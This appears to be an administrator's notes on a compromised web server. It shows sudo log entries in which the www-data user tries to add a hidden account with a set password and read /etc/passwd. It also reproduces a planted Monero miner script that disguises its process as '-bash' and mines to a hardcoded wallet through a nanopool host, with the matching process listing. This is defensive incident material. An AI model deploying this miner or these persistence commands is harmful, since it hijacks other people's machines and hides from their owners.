mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq” listd
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "54e172662" | passwd --stdin listd
mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
it’s this code: https://forums.gentoo.org/viewtopic-t-1071762.html?sid=dd3123941f591f81c8ab5b8c4769dd1f
/tmp/.s/upd looks like:
#!/bin/bash
#[+] Miner v2.0 - 2017
#[+] Author: PRG @ #old UnderNet
wallet="4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8"
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
fi
echo $! > bash.pid
0 S www-data 18219 1 4 80 0 - 28841 futex_ 10:13 ? 00:00:19 -bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8 -p x